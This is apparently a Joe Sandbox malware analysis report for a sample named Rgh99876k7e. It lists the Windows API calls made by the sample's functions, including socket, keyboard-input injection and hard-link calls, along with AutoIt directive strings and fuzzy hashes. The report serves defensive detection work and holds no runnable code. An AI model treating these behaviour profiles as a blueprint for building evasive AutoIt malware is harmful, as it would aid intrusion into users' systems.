                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00783106
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 946324512-2422070025
                          • Opcode ID: 81db4abb209aa17bde275aeb6830b1bb9710bd43eab1880a7076778b28e35f8a
                          • Instruction ID: ca5902dabb93bbef5c9aadb32b522afa696ac481f7305db7e30219021f12eb07
                          • Opcode Fuzzy Hash: 81db4abb209aa17bde275aeb6830b1bb9710bd43eab1880a7076778b28e35f8a
                          • Instruction Fuzzy Hash: 7531D335604205DFCB10EF2CC489EAA77E1EF14B18F248159E9168B392DB7AEE42C760
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00794705
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00794713
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0079471A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
                          • Instruction ID: 89852a868122cce20c4dfa087977cf7be7cea369d4e984d1dc2e2c0ff46f0580
                          • Opcode Fuzzy Hash: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
                          • Instruction Fuzzy Hash: DB214CB5600208AFDB11DF64EC95DBA37ADEB5A394B440059FA009B291DB38EC12CA60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 176396367-2734436370
                          • Opcode ID: f2090c1d41ded59c78e8e6026808bca1aa59350cb6c487a4c6dc369588105e65
                          • Instruction ID: 15679282cf958e4838065df58d405d0cd99c15d83d7718e47ab3d2f2dfb7bd8f
                          • Opcode Fuzzy Hash: f2090c1d41ded59c78e8e6026808bca1aa59350cb6c487a4c6dc369588105e65
                          • Instruction Fuzzy Hash: 86212672604620A6C731AA24E806FB773DCDF51300F14402AFE5BA7082EB7DAD55C296
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00793840
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00793850
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00793876
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
                          • Instruction ID: 6b6cc2b80485cf5b1766d2bf89d5110f58a276b4a148a36b48db5830852545a6
                          • Opcode Fuzzy Hash: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
                          • Instruction Fuzzy Hash: 8921A472610118BBEF21DF94DC85FBB376EEF89764F108115F9059B190C679DC5287A0
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00774A08
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00774A5C
                          • SetErrorMode.KERNEL32(00000000,?,?,0079CC08), ref: 00774AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: %lu
                          • API String ID: 2507767853-685833217
                          • Opcode ID: 882e90392f92b2ebd6bab3fe67837afb51162779cf4ce12753857f4826d81afe
                          • Instruction ID: 9dbaaa11ebdcb5e296f287f22318d4e1beda70bdee652d00254e4f92039479a0
                          • Opcode Fuzzy Hash: 882e90392f92b2ebd6bab3fe67837afb51162779cf4ce12753857f4826d81afe
                          • Instruction Fuzzy Hash: 28313075A00109EFDB11DF64C885EAA7BF8EF04304F1580A9E909DB392D779ED46CB61
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0079424F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00794264
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00794271
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
                          • Instruction ID: 2d32b8d6ff0803a78acefa314915fc02f5f2f4f21ae945c3fea86ec44d0c43b4
                          • Opcode Fuzzy Hash: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
                          • Instruction Fuzzy Hash: E5110632240208BEEF209F29DC06FAB3BACFF85B64F110528FA55E2190D675DC529B20
                          APIs
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                            • Part of subcall function 00762DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
                            • Part of subcall function 00762DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
                            • Part of subcall function 00762DA7: GetCurrentThreadId.KERNEL32 ref: 00762DDD
                            • Part of subcall function 00762DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4
                          • GetFocus.USER32 ref: 00762F78
                            • Part of subcall function 00762DEE: GetParent.USER32(00000000), ref: 00762DF9
                          • GetClassNameW.USER32(?,?,00000100), ref: 00762FC3
                          • EnumChildWindows.USER32(?,0076303B), ref: 00762FEB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                          • String ID: %s%d
                          • API String ID: 1272988791-1110647743
                          • Opcode ID: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
                          • Instruction ID: 033e3dcbfa8d79805b5eeb6eec8c25ef5b31272ee93bf0057809c73746d30108
                          • Opcode Fuzzy Hash: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
                          • Instruction Fuzzy Hash: 4B11C0B1300205EBDF556F60CC99EED37AAAF84304F148075FD0A9B292DE38994ACB70
                          APIs
                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958C1
                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958EE
                          • DrawMenuBar.USER32(?), ref: 007958FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: 0
                          • API String ID: 3227129158-4108050209
                          • Opcode ID: 112da67497ad3ac712774feae4f29e4b8ba94252e8bbb423654b52997cf560d8
                          • Instruction ID: f816ed6f9a5a8b93635bf2c6aa51a2b784738b0c65450265c7b6ebb5af77bfa9
                          • Opcode Fuzzy Hash: 112da67497ad3ac712774feae4f29e4b8ba94252e8bbb423654b52997cf560d8
                          • Instruction Fuzzy Hash: CA018431500228EFDF129F15EC44BEEBBB4FF45760F108099E849D6151DB389A94DF21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
                          • Instruction ID: 1abb453d1deb80e51408aa3baf7824a04de7999fe8461bf637e3d894525fef2a
                          • Opcode Fuzzy Hash: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
                          • Instruction Fuzzy Hash: 3AC16D75A0020AEFDB14CFA8C898EAEB7B5FF48314F108598E906EB251D735ED41DB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInitInitializeUninitialize
                          • String ID:
                          • API String ID: 1998397398-0
                          • Opcode ID: 215feee43135745ebfbc78c8188b1a2190a7d3f68b57ab1f775ab84e1faaf8fe
                          • Instruction ID: 1af5f84049824ba4e961c970b3ed239d383f487a199b5d645cf60296faee67fa
                          • Opcode Fuzzy Hash: 215feee43135745ebfbc78c8188b1a2190a7d3f68b57ab1f775ab84e1faaf8fe
                          • Instruction Fuzzy Hash: 9EA14F75604301DFCB05EF28C889A6AB7E5FF88714F048959F9899B3A1DB38EE41CB51
                          APIs
                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0079FC08,?), ref: 007605F0
                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0079FC08,?), ref: 00760608
                          • CLSIDFromProgID.OLE32(?,?,00000000,0079CC40,000000FF,?,00000000,00000800,00000000,?,0079FC08,?), ref: 0076062D
                          • _memcmp.LIBVCRUNTIME ref: 0076064E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FromProg$FreeTask_memcmp
                          • String ID:
                          • API String ID: 314563124-0
                          • Opcode ID: 63ae7ac9f38084293e1aab0b18ad6bfd194c17c47346972ca817910db2e20a32
                          • Instruction ID: cecab9d085c0c9f4333dca2064260285842cf157e4d61385ca9ba3dea3e9b7ad
                          • Opcode Fuzzy Hash: 63ae7ac9f38084293e1aab0b18ad6bfd194c17c47346972ca817910db2e20a32
                          • Instruction Fuzzy Hash: 32810C75A00109EFCF04DF94C988DEEB7B9FF89315F204558E906AB251DB75AE06CBA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 83de5bffd2dcbbbda58a096fe8e5069bb70a982308465341c59e67ad53d60b1b
                          • Instruction ID: ba9050f0a8a75d28ff0ba90dd2cdb4507bda0d600de6b55a534ea2843565d619
                          • Opcode Fuzzy Hash: 83de5bffd2dcbbbda58a096fe8e5069bb70a982308465341c59e67ad53d60b1b
                          • Instruction Fuzzy Hash: 10412C32A40154EBEB217BFDAC49ABE3AF4FF42370F544236F419D6192E77C88815661
                          APIs
                          • GetWindowRect.USER32(0191F278,?), ref: 007962E2
                          • ScreenToClient.USER32(?,?), ref: 00796315
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00796382
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
                          • Instruction ID: 22373301f3b603230f01ceaa5c0fb29679d43bda3cf6897aa7599df79769baaf
                          • Opcode Fuzzy Hash: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
                          • Instruction Fuzzy Hash: D0515F75A00249EFDF11DF68E8819AE7BB5FF45360F10825AF9159B2A0D734ED81CB50
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00781AFD
                          • WSAGetLastError.WSOCK32 ref: 00781B0B
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00781B8A
                          • WSAGetLastError.WSOCK32 ref: 00781B94
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$socket
                          • String ID:
                          • API String ID: 1881357543-0
                          • Opcode ID: 8425e966b7bbf88613793e5012e460ca924fa1413c411c8f25aeac01c347de59
                          • Instruction ID: 083511a474089057c0497f146a0908ba4080c9aa14446108eaa12b6cce0e043c
                          • Opcode Fuzzy Hash: 8425e966b7bbf88613793e5012e460ca924fa1413c411c8f25aeac01c347de59
                          • Instruction Fuzzy Hash: 9F41D474640200EFE720AF24C88AF657BE5AB44718F54C558F91A9F3D2D77AED82CB90
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
                          • Instruction ID: f8f61441d4097ea5e0b417b75fe5055c62d49942a00f4c778d3fd5c917582bf4
                          • Opcode Fuzzy Hash: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
                          • Instruction Fuzzy Hash: 36411776A00354FFE724AF38CC45B6ABBE9EB88710F10452AF241DB283D779A9518780
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00775783
                          • GetLastError.KERNEL32(?,00000000), ref: 007757A9
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007757CE
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007757FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 3dea21909d43ef416c269596e1bf0e5a42eeacffd113e889255769e71c5d832d
                          • Instruction ID: d7a17619469735df4e4c4d92e359acb1391c58b902e3385bd09c9d87e6903994
                          • Opcode Fuzzy Hash: 3dea21909d43ef416c269596e1bf0e5a42eeacffd113e889255769e71c5d832d
                          • Instruction Fuzzy Hash: A5412F35600610DFCF15DF15C548A5DBBE2EF49320B19C988E84A5B3A2CB78FD41CB91
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00726D71,00000000,00000000,007282D9,?,007282D9,?,00000001,00726D71,?,00000001,007282D9,007282D9), ref: 0073D910
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0073D999
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0073D9AB
                          • __freea.LIBCMT ref: 0073D9B4
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
                          • Instruction ID: 5288ba8abb55f45047f30eaa47b05c88155b0bdf7efcf62e2afcfb6f48436e60
                          • Opcode Fuzzy Hash: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
                          • Instruction Fuzzy Hash: 0031CF72A0021AABEF25DF64EC45EAE7BA5EB40310F054169FC04D7252EB39ED51CBA0
                          APIs
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00795352
                          • GetWindowLongW.USER32(?,000000F0), ref: 00795375
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00795382
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007953A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongWindow$InvalidateMessageRectSend
                          • String ID:
                          • API String ID: 3340791633-0
                          • Opcode ID: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
                          • Instruction ID: b76fe1173d85db752b44d5185500eb07e3234bff7fcff2eb0b117325e8e4d483
                          • Opcode Fuzzy Hash: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
                          • Instruction Fuzzy Hash: 83310834A55A28FFEF329F54EC15FE83761AB05398F588102FA10961E1C7BC9D80DB51
                          APIs
                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0076ABF1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0076AC0D
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0076AC74
                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0076ACC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
                          • Instruction ID: c0ea41007369e815bd994ab0fb10db359bcb535c9eace2369461537d4c6c714f
